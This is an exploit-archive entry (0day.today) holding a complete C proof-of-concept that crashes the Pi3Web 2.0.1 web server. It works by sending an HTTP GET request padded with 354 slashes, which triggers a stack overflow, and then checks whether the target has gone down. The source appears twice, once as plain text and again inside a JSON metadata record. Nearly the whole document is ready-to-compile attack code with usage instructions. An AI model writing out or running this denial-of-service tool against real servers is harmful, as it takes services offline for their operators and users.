ID 1337DAY-ID-5823
Type zdt
Reporter aT4r
Modified 2003-04-29T00:00:00
Description
Exploit for unknown platform in category dos / poc
=================================================
Pi3Web 2.0.1 Denial of Service - Proof of Concept
=================================================
/* Pi3Web 2.0.1 DoS - Pr00f of concept.
*
* Vulnerable systems: Pi3Web 2.0.1 (maybe others)
* Vendor: www.johnroy.com/pi3 - http://pi3web.sourceforge.net/
* Patch: no yet.
*
* Info: Pi3Web Server is vulnerable to a denial of Service.
* when a malformed HTTP Request is done the webserver hangs
* due to an stack overflow. GET /////////..[354]../////////
*
* Found by [email protected] 04/26/2003
* Compiled with: lcc-win32 v3.3.
*
*/
#pragma comment (lib,"ws2_32")
#include <stdio.h>
#include <windows.h>
#include <winsock2.h>
#include <string.h>
char evilbuffer[1024],evilrequest[512],ip[15];
short port=80;
int isalive(int OPT)
{
struct sockaddr_in haxorcitos;
int fd;
haxorcitos.sin_port = htons(port);
haxorcitos.sin_family = AF_INET;
haxorcitos.sin_addr.s_addr = inet_addr(ip);
if ((fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
{
printf(" [-] Unable to Create Socket\n\n");
return(0);
}
if (connect(fd,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos)) == -1)
{
if (OPT==0)
printf(" [+] Exploit Success. Remote webserver shutdown\n");
else
printf(" [-] Unable to connect\n\n");
return(0);
}
if (OPT==0)
{
printf(" [-] Exploit Failed. System Patched?\n\n");
}
else
{
send(fd,evilbuffer, strlen(evilbuffer),0);
printf(" [+] Data Sent. Now Checking Host\n");
closesocket(fd);
}
return(1);
}
void usage(void)
{
printf(" [+] Usage: PiDoS.exe HOST [port]\n\n"); exit(1);
}
void main(int argc,char *argv[])
{
WSADATA ws;
if (WSAStartup( MAKEWORD(1,1), &ws )!=0)
{
printf(" [+] WSAStartup() error\n");
exit(0);
}
printf("\n . .. ...:Pi3Web Denial of Service ([email protected]) :...
..\n\n");
if ((argc!=2) && (argc!=3))
usage();
strcpy(ip,argv[1]);
if (argc==3) port=atoi(argv[2]);
memset(evilrequest,0,512);
memset(evilbuffer,0,1024);
memset(evilrequest,'/',354);
//sprintf(evilbuffer, "GET %s\r\n",evilrequest);
sprintf(evilbuffer,"GET %s HTTP/1.0\r\nUser-Agent: foo\r\nHost:
%s\r\n\r\n\r\n",evilrequest,argv[2]);
if (isalive(1))
{ sleep(1000); isalive(0);}
}
# 0day.today [2018-04-13] #
{"published": "2003-04-29T00:00:00", "id": "1337DAY-ID-5823", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category dos / poc", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2018-04-13T07:48:25", "rev": 2}, "dependencies": {"references": [], "modified": "2018-04-13T07:48:25", "rev": 2}, "vulnersScore": -0.1}, "type": "zdt", "lastseen": "2018-04-13T07:48:25", "edition": 2, "title": "Pi3Web 2.0.1 Denial of Service - Proof of Concept ", "href": "https://0day.today/exploit/description/5823", "modified": "2003-04-29T00:00:00", "bulletinFamily": "exploit", "viewCount": 2, "cvelist": [], "sourceHref": "https://0day.today/exploit/5823", "references": [], "reporter": "aT4r", "sourceData": "=================================================\r\nPi3Web 2.0.1 Denial of Service - Proof of Concept \r\n=================================================\r\n\r\n\r\n\r\n\r\n/* Pi3Web 2.0.1 DoS - Pr00f of concept.\r\n*\r\n* Vulnerable systems: Pi3Web 2.0.1 (maybe others)\r\n* Vendor: www.johnroy.com/pi3 - http://pi3web.sourceforge.net/\r\n* Patch: no yet.\r\n*\r\n* Info: Pi3Web Server is vulnerable to a denial of Service.\r\n* when a malformed HTTP Request is done the webserver hangs \r\n* due to an stack overflow. GET /////////..[354]../////////\r\n*\r\n* Found by [email\u00a0protected] 04/26/2003\r\n* Compiled with: lcc-win32 v3.3.\r\n*\r\n*/\r\n\r\n#pragma comment (lib,\"ws2_32\")\r\n#include <stdio.h>\r\n#include <windows.h>\r\n#include <winsock2.h>\r\n#include <string.h>\r\n\r\nchar evilbuffer[1024],evilrequest[512],ip[15];\r\nshort port=80;\r\n\r\n\r\nint isalive(int OPT)\r\n{\r\n\tstruct sockaddr_in haxorcitos;\r\n\tint fd;\r\n\r\n\thaxorcitos.sin_port = htons(port);\r\n\thaxorcitos.sin_family = AF_INET;\r\n\thaxorcitos.sin_addr.s_addr = inet_addr(ip);\r\n\r\n\tif ((fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)\r\n\t{\r\n\t\tprintf(\" [-] Unable to Create Socket\\n\\n\");\r\n\t\treturn(0);\r\n\t}\r\n\tif (connect(fd,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos)) == -1)\r\n\t{\r\n\t\tif (OPT==0)\r\n\t\t\tprintf(\" [+] Exploit Success. Remote webserver shutdown\\n\");\r\n\t\telse\r\n\t\t\tprintf(\" [-] Unable to connect\\n\\n\");\r\n\t\treturn(0);\r\n\t}\r\n\tif (OPT==0)\r\n\t{\r\n\t\tprintf(\" [-] Exploit Failed. System Patched?\\n\\n\");\r\n\t}\r\n\telse\r\n\t{\r\n\t\tsend(fd,evilbuffer, strlen(evilbuffer),0);\r\n\t\tprintf(\" [+] Data Sent. Now Checking Host\\n\");\r\n\t\tclosesocket(fd);\r\n\r\n\t}\r\nreturn(1);\r\n}\r\n\r\n\r\nvoid usage(void)\r\n{\r\n\tprintf(\" [+] Usage: PiDoS.exe HOST [port]\\n\\n\");\texit(1);\r\n}\r\n\r\n\r\nvoid main(int argc,char *argv[])\r\n{\r\n\tWSADATA ws;\r\n\r\n\tif\t(WSAStartup( MAKEWORD(1,1), &ws )!=0)\r\n\t{\r\n\t\tprintf(\" [+] WSAStartup() error\\n\");\r\n\t\texit(0);\r\n\t}\r\n\r\n\tprintf(\"\\n . .. ...:Pi3Web Denial of Service ([email\u00a0protected]) :... \r\n..\\n\\n\");\r\n\r\n\tif ((argc!=2) && (argc!=3))\r\n\t\tusage();\r\n\r\n\tstrcpy(ip,argv[1]);\r\n\tif (argc==3) port=atoi(argv[2]);\r\n\r\n\tmemset(evilrequest,0,512);\r\n\tmemset(evilbuffer,0,1024);\r\n\tmemset(evilrequest,'/',354);\r\n\t//sprintf(evilbuffer, \"GET %s\\r\\n\",evilrequest);\r\n\tsprintf(evilbuffer,\"GET %s HTTP/1.0\\r\\nUser-Agent: foo\\r\\nHost: \r\n%s\\r\\n\\r\\n\\r\\n\",evilrequest,argv[2]);\r\n\r\n\tif (isalive(1))\r\n\t\t{ sleep(1000); isalive(0);}\r\n\r\n}\r\n\r\n\r\n\n# 0day.today [2018-04-13] #"}
{}
